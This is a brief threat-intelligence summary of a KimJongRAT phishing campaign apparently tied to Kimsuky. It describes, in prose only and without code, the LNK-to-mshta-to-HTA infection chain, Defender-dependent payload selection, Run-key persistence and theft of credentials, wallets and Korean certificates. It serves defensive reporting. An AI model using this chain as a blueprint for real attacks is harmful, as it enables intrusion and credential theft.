ESRC observed KimJongRAT, a RAT associated in the source with the Kimsuky threat cluster, being distributed through phishing email carrying a tax-notice-themed ZIP file. The archive contains an LNK disguised as a PDF; when opened, it decodes a Base64 URL, invokes mshta, and retrieves a remote HTA loader. The HTA uses VBScript to download decoy and malicious files, including Google Drive-hosted payloads, and selects different follow-on payloads depending on whether Windows Defender is enabled. The final payloads collect system information, browser stored data and encryption keys, cryptocurrency wallet information, Telegram and Discord data, and Korean NPKI/GPKI certificates while adding Run-key persistence. The focus on Korean certificate material and local data suggests a Korea-focused intrusion set aimed at credential and information theft.